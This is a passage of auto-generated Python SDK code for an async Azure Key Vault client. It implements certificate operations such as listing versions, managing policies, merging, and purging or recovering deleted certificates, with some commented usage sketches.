cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_certificate_versions.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CertificateListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_certificate_versions.metadata = {'url': '/certificates/{certificate-name}/versions'} # type: ignore
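# Paging sketch (assumption: `client` is an authenticated instance of this class). Like
# get_certificates, this returns an AsyncItemPaged of CertificateItem objects, one per
# version of the named certificate.
#
#     async def list_versions(client, vault_url, name):
#         return [item.id async for item in
#                 client.get_certificate_versions(vault_url, name)]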
async def get_certificate_policy(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.CertificatePolicy":
"""Lists the policy for a certificate.
The GetCertificatePolicy operation returns the specified certificate policy resource in the
specified key vault. This operation requires the certificates/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate in a given key vault.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificatePolicy, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificatePolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificatePolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate_policy.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificatePolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate_policy.metadata = {'url': '/certificates/{certificate-name}/policy'} # type: ignore
async def update_certificate_policy(
self,
vault_base_url: str,
certificate_name: str,
certificate_policy: "_models.CertificatePolicy",
**kwargs: Any
) -> "_models.CertificatePolicy":
"""Updates the policy for a certificate.
Sets the specified members in the certificate policy; members left as null are not changed. This operation requires
the certificates/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate in the given vault.
:type certificate_name: str
:param certificate_policy: The policy for the certificate.
:type certificate_policy: ~azure.keyvault.v2016_10_01.models.CertificatePolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificatePolicy, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificatePolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificatePolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate_policy.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(certificate_policy, 'CertificatePolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificatePolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate_policy.metadata = {'url': '/certificates/{certificate-name}/policy'} # type: ignore
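# Hedged example (assumption: `client` is an authenticated instance of this class): only
# the members set on the supplied CertificatePolicy are updated; members left as None are
# not changed.
#
#     from azure.keyvault.v2016_10_01 import models as _kv_models
#
#     async def bump_validity(client, vault_url, name):
#         policy = _kv_models.CertificatePolicy(
#             x509_certificate_properties=_kv_models.X509CertificateProperties(
#                 validity_in_months=24))
#         return await client.update_certificate_policy(vault_url, name, policy)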
async def update_certificate(
self,
vault_base_url: str,
certificate_name: str,
certificate_version: str,
parameters: "_models.CertificateUpdateParameters",
**kwargs: Any
) -> "_models.CertificateBundle":
"""Updates the specified attributes associated with the given certificate.
The UpdateCertificate operation applies the specified update on the given certificate; the only
elements updated are the certificate's attributes. This operation requires the
certificates/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate in the given key vault.
:type certificate_name: str
:param certificate_version: The version of the certificate.
:type certificate_version: str
:param parameters: The parameters for certificate update.
:type parameters: ~azure.keyvault.v2016_10_01.models.CertificateUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
'certificate-version': self._serialize.url("certificate_version", certificate_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CertificateUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate.metadata = {'url': '/certificates/{certificate-name}/{certificate-version}'} # type: ignore
async def get_certificate(
self,
vault_base_url: str,
certificate_name: str,
certificate_version: str,
**kwargs: Any
) -> "_models.CertificateBundle":
"""Gets information about a certificate.
Gets information about a specific certificate. This operation requires the certificates/get
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate in the given vault.
:type certificate_name: str
:param certificate_version: The version of the certificate.
:type certificate_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
'certificate-version': self._serialize.url("certificate_version", certificate_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate.metadata = {'url': '/certificates/{certificate-name}/{certificate-version}'} # type: ignore
async def update_certificate_operation(
self,
vault_base_url: str,
certificate_name: str,
certificate_operation: "_models.CertificateOperationUpdateParameter",
**kwargs: Any
) -> "_models.CertificateOperation":
"""Updates a certificate operation.
Updates a certificate creation operation that is already in progress. This operation requires
the certificates/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param certificate_operation: The certificate operation update parameters.
:type certificate_operation: ~azure.keyvault.v2016_10_01.models.CertificateOperationUpdateParameter
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateOperation, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate_operation.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(certificate_operation, 'CertificateOperationUpdateParameter')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate_operation.metadata = {'url': '/certificates/{certificate-name}/pending'} # type: ignore
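# Hypothetical usage sketch: assumes ``client`` is an authenticated instance of
# this async client and that CertificateOperationUpdateParameter exposes a
# ``cancellation_requested`` field (an assumption) for cancelling an
# in-progress creation; the import path is taken from the docstring references.
#
#     from azure.keyvault.v2016_10_01 import models
#
#     op = await client.update_certificate_operation(
#         "https://myvault.vault.azure.net",
#         "mycert",
#         models.CertificateOperationUpdateParameter(cancellation_requested=True))
#     print(op.status)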
async def get_certificate_operation(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.CertificateOperation":
"""Gets the creation operation of a certificate.
Gets the creation operation associated with a specified certificate. This operation requires
the certificates/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateOperation, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate_operation.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate_operation.metadata = {'url': '/certificates/{certificate-name}/pending'} # type: ignore
async def delete_certificate_operation(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.CertificateOperation":
"""Deletes the creation operation for a specific certificate.
Deletes the creation operation for a specified certificate that is in the process of being
created. The certificate is no longer created. This operation requires the certificates/update
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateOperation, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_certificate_operation.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_certificate_operation.metadata = {'url': '/certificates/{certificate-name}/pending'} # type: ignore
async def merge_certificate(
self,
vault_base_url: str,
certificate_name: str,
parameters: "_models.CertificateMergeParameters",
**kwargs: Any
) -> "_models.CertificateBundle":
"""Merges a certificate or a certificate chain with a key pair existing on the server.
The MergeCertificate operation performs the merging of a certificate or certificate chain with
a key pair currently available in the service. This operation requires the certificates/create
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param parameters: The parameters to merge a certificate.
:type parameters: ~azure.keyvault.v2016_10_01.models.CertificateMergeParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.merge_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CertificateMergeParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
merge_certificate.metadata = {'url': '/certificates/{certificate-name}/pending/merge'} # type: ignore
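# Hypothetical usage sketch: assumes ``client`` is an authenticated instance of
# this async client and that CertificateMergeParameters accepts the signed
# chain via an ``x509_certificates`` list of byte strings (an assumption);
# ``signed_cert_bytes`` is illustrative only.
#
#     from azure.keyvault.v2016_10_01 import models
#
#     merged = await client.merge_certificate(
#         "https://myvault.vault.azure.net",
#         "mycert",
#         models.CertificateMergeParameters(x509_certificates=[signed_cert_bytes]))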
def get_deleted_certificates(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.DeletedCertificateListResult"]:
"""Lists the deleted certificates in the specified vault currently available for recovery.
The GetDeletedCertificates operation retrieves the certificates in the current vault which are
in a deleted state and ready for recovery or purging. This operation includes deletion-specific
information. This operation requires the certificates/get/list permission. This operation can
only be enabled on soft-delete enabled vaults.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeletedCertificateListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.DeletedCertificateListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedCertificateListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_deleted_certificates.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DeletedCertificateListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_deleted_certificates.metadata = {'url': '/deletedcertificates'} # type: ignore
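# Hypothetical usage sketch: this method returns an AsyncItemPaged, so the
# deleted certificates are consumed with ``async for`` (``client`` is assumed
# to be an authenticated instance of this async client).
#
#     async for item in client.get_deleted_certificates(
#             "https://myvault.vault.azure.net", maxresults=25):
#         print(item.id)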
async def get_deleted_certificate(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.DeletedCertificateBundle":
"""Retrieves information about the specified deleted certificate.
The GetDeletedCertificate operation retrieves the deleted certificate information plus its
attributes, such as retention interval, scheduled permanent deletion and the current deletion
recovery level. This operation requires the certificates/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedCertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedCertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedCertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_deleted_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedCertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_deleted_certificate.metadata = {'url': '/deletedcertificates/{certificate-name}'} # type: ignore
async def purge_deleted_certificate(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> None:
"""Permanently deletes the specified deleted certificate.
The PurgeDeletedCertificate operation performs an irreversible deletion of the specified
certificate, without possibility for recovery. The operation is not available if the recovery
level does not specify 'Purgeable'. This operation requires the certificate/purge permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.purge_deleted_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
purge_deleted_certificate.metadata = {'url': '/deletedcertificates/{certificate-name}'} # type: ignore
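# Hypothetical usage sketch: purge returns no body (HTTP 204), so the call is
# simply awaited. ``client`` is assumed to be an authenticated instance of this
# async client, and the vault must allow purging per its recovery level.
#
#     await client.purge_deleted_certificate(
#         "https://myvault.vault.azure.net", "mycert")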
async def recover_deleted_certificate(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.CertificateBundle":
"""Recovers the deleted certificate back to its current version under /certificates.
The RecoverDeletedCertificate operation performs the reversal of the Delete operation. The
operation is applicable in vaults enabled for soft-delete, and must be issued during the
retention interval (available in the deleted certificate's attributes). This operation requires
the certificates/recover permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the deleted certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.recover_deleted_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
